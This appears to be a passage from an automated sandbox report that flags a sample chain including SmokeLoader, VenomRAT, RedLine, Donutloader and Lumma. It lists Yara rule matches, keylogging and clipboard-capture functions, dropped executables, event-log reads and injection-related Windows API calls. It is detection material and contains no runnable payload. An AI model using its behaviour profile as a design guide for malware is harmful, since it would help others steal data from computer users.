Source: Yara match	File source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: Process Memory Space: vm.exe PID: 392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vm.exe PID: 5776, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: 37.2.vm.exe.4e40000.1.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout
Source: 43.2.vm.exe.28c0000.1.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 31_2_02EDED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

31_2_02EDED00

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 31_2_02EDED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

31_2_02EDED00

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 31_2_02EDFB2F GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

31_2_02EDFB2F

Source: SciTE.exe.5.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_eca01e57-9

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\AppData\Local\Temp\753F.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Users\user\AppData\Local\Temp\753F.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell

System Summary

Malicious sample detected (through community Yara rule)

Source: 37.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 43.2.vm.exe.28c0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 37.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 43.2.vm.exe.28c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000025.00000002.3741871434.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000002B.00000002.2935972956.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000026.00000002.2904757056.0000000003870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.1462755251.00000000006DE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000010.00000002.1780256705.000000000050D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000026.00000002.2881701412.0000000000060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000010.00000002.1780382606.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0000002B.00000002.2872562883.0000000000480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Found suspicious ZIP file

Source: venom.zip.32.dr	Zip Entry: runvm.bat
Source: lumma.zip.32.dr	Zip Entry: run.bat

PE file contains section with special chars

Source: MyProg.exe.5.dr

Static PE information: section name: Y|uR

PE file has a writeable .text section

Source: IXDaI.exe.4.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 771E0000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Memory allocated: 771E0000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 771E0000 page execute and read and write

Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_00401538 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401538
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_00402FE9 RtlCreateUserThread,NtTerminateProcess,	4_2_00402FE9
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_004014DE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004014DE
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_00401496 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401496
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401543
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_00401565 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401565
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_00401579 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401579
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_0040157C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040157C
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_00401538 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	16_2_00401538
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_00402FE9 RtlCreateUserThread,NtTerminateProcess,	16_2_00402FE9
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_004014DE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	16_2_004014DE
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_00401496 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	16_2_00401496
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	16_2_00401543
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_00401565 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	16_2_00401565
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_00401579 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	16_2_00401579
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_0040157C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	16_2_0040157C
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B906900 RtlAllocateHeap,NtQuerySystemInformation,	24_2_00007FF70B906900
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B925100 NtWriteVirtualMemory,	24_2_00007FF70B925100
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B925260 NtAllocateVirtualMemory,	24_2_00007FF70B925260
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B924FC0 NtReadVirtualMemory,	24_2_00007FF70B924FC0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B9259D0 NtProtectVirtualMemory,	24_2_00007FF70B9259D0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B923F30 NtQueryInformationProcess,	24_2_00007FF70B923F30

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 5_2_00BA6076	5_2_00BA6076
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 5_2_00BA6D00	5_2_00BA6D00
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 17_2_00EE6076	17_2_00EE6076
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 17_2_00EE6D00	17_2_00EE6D00
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8DE810	24_2_00007FF70B8DE810
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8DBAB0	24_2_00007FF70B8DBAB0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B9416C0	24_2_00007FF70B9416C0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8C64A0	24_2_00007FF70B8C64A0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8EB6A0	24_2_00007FF70B8EB6A0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8E3AD0	24_2_00007FF70B8E3AD0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8D5ED0	24_2_00007FF70B8D5ED0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8C5AD4	24_2_00007FF70B8C5AD4
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B9004D0	24_2_00007FF70B9004D0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B90B6B0	24_2_00007FF70B90B6B0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B948AB0	24_2_00007FF70B948AB0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8CA0F0	24_2_00007FF70B8CA0F0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B921700	24_2_00007FF70B921700
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8D5910	24_2_00007FF70B8D5910
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B901510	24_2_00007FF70B901510
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8D3E30	24_2_00007FF70B8D3E30
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8F9830	24_2_00007FF70B8F9830
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B91CC40	24_2_00007FF70B91CC40
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8C1450	24_2_00007FF70B8C1450
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8D0050	24_2_00007FF70B8D0050
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B91B020	24_2_00007FF70B91B020
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B91E430	24_2_00007FF70B91E430
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B93C230	24_2_00007FF70B93C230
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B913E80	24_2_00007FF70B913E80
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B912080	24_2_00007FF70B912080
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B915860	24_2_00007FF70B915860
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8F1880	24_2_00007FF70B8F1880
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B9043B0	24_2_00007FF70B9043B0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8DD7A0	24_2_00007FF70B8DD7A0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B93DFD0	24_2_00007FF70B93DFD0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8EA9D0	24_2_00007FF70B8EA9D0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B9057C0	24_2_00007FF70B9057C0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8DCFF0	24_2_00007FF70B8DCFF0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8D4BF0	24_2_00007FF70B8D4BF0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B906DE0	24_2_00007FF70B906DE0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8F29E0	24_2_00007FF70B8F29E0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B918C10	24_2_00007FF70B918C10
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B922010	24_2_00007FF70B922010
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B934E10	24_2_00007FF70B934E10
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8EFC10	24_2_00007FF70B8EFC10
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8E4E00	24_2_00007FF70B8E4E00
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8CC400	24_2_00007FF70B8CC400
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8D7000	24_2_00007FF70B8D7000
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8CBC00	24_2_00007FF70B8CBC00
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B9111F0	24_2_00007FF70B9111F0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B916DF0	24_2_00007FF70B916DF0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B9449F0	24_2_00007FF70B9449F0
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B935D40	24_2_00007FF70B935D40
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8D1920	24_2_00007FF70B8D1920
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B909550	24_2_00007FF70B909550
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B903150	24_2_00007FF70B903150
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B943F20	24_2_00007FF70B943F20
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8F0740	24_2_00007FF70B8F0740
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8CFB70	24_2_00007FF70B8CFB70
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B925B80	24_2_00007FF70B925B80
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B92898B	24_2_00007FF70B92898B
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B8ED390	24_2_00007FF70B8ED390
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B917D60	24_2_00007FF70B917D60
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B924370	24_2_00007FF70B924370
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B91F370	24_2_00007FF70B91F370
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B946B70	24_2_00007FF70B946B70
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 28_2_00007FF7C08C51EE	28_2_00007FF7C08C51EE
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 28_2_00007FF7C08C4186	28_2_00007FF7C08C4186
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 28_2_00007FF7C08C3D00	28_2_00007FF7C08C3D00
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 28_2_00007FF7C08C3420	28_2_00007FF7C08C3420
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 28_2_00007FF7C08C4742	28_2_00007FF7C08C4742
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 28_2_00007FF7C08D0AB8	28_2_00007FF7C08D0AB8
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 28_2_00007FF7C08D0F0D	28_2_00007FF7C08D0F0D
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 28_2_00007FF7C08CC7A0	28_2_00007FF7C08CC7A0
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 30_2_00007FF7C08A4752	30_2_00007FF7C08A4752
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 30_2_00007FF7C08A3355	30_2_00007FF7C08A3355
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 30_2_00007FF7C08A4196	30_2_00007FF7C08A4196
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 30_2_00007FF7C08A5243	30_2_00007FF7C08A5243
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EB52E0	31_2_02EB52E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EC72DD	31_2_02EC72DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02ED2290	31_2_02ED2290
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02ED1B52	31_2_02ED1B52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EC1B25	31_2_02EC1B25
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EC7189	31_2_02EC7189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02ED6F80	31_2_02ED6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EB1F10	31_2_02EB1F10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EE3CD0	31_2_02EE3CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02ECEC40	31_2_02ECEC40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EECD40	31_2_02EECD40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EC82CB	31_2_02EC82CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EB7270	31_2_02EB7270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EBC270	31_2_02EBC270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02ED6210	31_2_02ED6210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02ED4BF0	31_2_02ED4BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02ED33B6	31_2_02ED33B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EB6B70	31_2_02EB6B70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EED340	31_2_02EED340
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EEB350	31_2_02EEB350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EBFB10	31_2_02EBFB10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02ECE086	31_2_02ECE086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EE8880	31_2_02EE8880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02ED6890	31_2_02ED6890
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EEB840	31_2_02EEB840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EED010	31_2_02EED010
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EEA9E4	31_2_02EEA9E4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02ED29C9	31_2_02ED29C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02ED41A0	31_2_02ED41A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EB8960	31_2_02EB8960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EEB160	31_2_02EEB160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EB4900	31_2_02EB4900
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EE3680	31_2_02EE3680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EC5E97	31_2_02EC5E97
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EC4E68	31_2_02EC4E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EC3678	31_2_02EC3678
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02ED3F97	31_2_02ED3F97
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EEB700	31_2_02EEB700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02ED0CB7	31_2_02ED0CB7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02ECEC06	31_2_02ECEC06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EB5DE0	31_2_02EB5DE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EB3DD0	31_2_02EB3DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 31_2_02EEB5A0	31_2_02EEB5A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 32_2_00007FF7C08A63FB	32_2_00007FF7C08A63FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 32_2_00007FF7C08A5E83	32_2_00007FF7C08A5E83

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\B552.exe 505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 02EB93B0 appears 39 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 02EBFCA0 appears 202 times

